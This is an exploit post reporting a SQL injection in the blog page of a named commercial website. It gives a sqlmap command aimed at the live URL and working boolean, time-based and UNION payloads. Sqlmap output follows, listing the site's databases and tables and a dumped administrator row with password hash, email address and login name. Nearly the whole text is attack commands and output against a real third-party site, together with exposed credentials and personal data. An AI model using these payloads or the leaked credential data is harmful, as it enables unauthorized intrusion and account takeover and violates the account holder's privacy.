# Exploit Title: BleuIO - Bluetooth Low Energy (BLE) USB Dongle | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://www.bleuio.com/blog/details.php?id=932" --dbs --batch
---------------------------------------------------------------------------------------------------
.com Commercial
BleuIO - Bluetooth Low Energy (BLE) USB Dongle
https://www.bleuio.com/blog/details.php?id=932
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=932 AND 4987=4987
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=932 AND (SELECT 7660 FROM (SELECT(SLEEP(5)))zddA)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=-6397 UNION ALL SELECT NULL,NULL,CONCAT(0x716b787671,0x745168597449744c6279465a6a574f7a7846646c686148795171645856615567797a70544e41764f,0x7176707a71),NULL,NULL-- -
---
the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
the back-end DBMS operating system: Linux Ubuntu
the back-end DBMS: MySQL >= 5.0.12
banner: '5.7.33-0ubuntu0.18.04.1'
available databases [3]:
[+] information_schema
[+] smart_db05
[+] test
Database: smart_db05
[24 tables]
+----------------------------+
| ssd_aiowps_events |
| ssd_aiowps_failed_logins |
| ssd_aiowps_global_meta |
| ssd_aiowps_login_activity |
| ssd_aiowps_login_lockdown |
| ssd_aiowps_permanent_block |
| ssd_commentmeta |
| ssd_comments |
| ssd_links |
| ssd_options |
| ssd_postmeta |
| ssd_posts |
| ssd_redirection_404 |
| ssd_redirection_groups |
| ssd_redirection_items |
| ssd_redirection_logs |
| ssd_term_relationships |
| ssd_term_taxonomy |
| ssd_termmeta |
| ssd_terms |
| ssd_usermeta |
| ssd_users |
| ssd_yoast_seo_links |
| ssd_yoast_seo_meta |
+----------------------------+
Database: smart_db05
Table: ssd_users
[1 entry]
+----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1 | <blank> | $P$BVCY5ZyykfMnm8e4Qr4zIM2vdvborE/ | shuhadz@hotmail.com | ssdAdmin | 0 | ssdAdmin | ssdadmin | 2020-03-23 10:10:38 | <blank> |
+----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+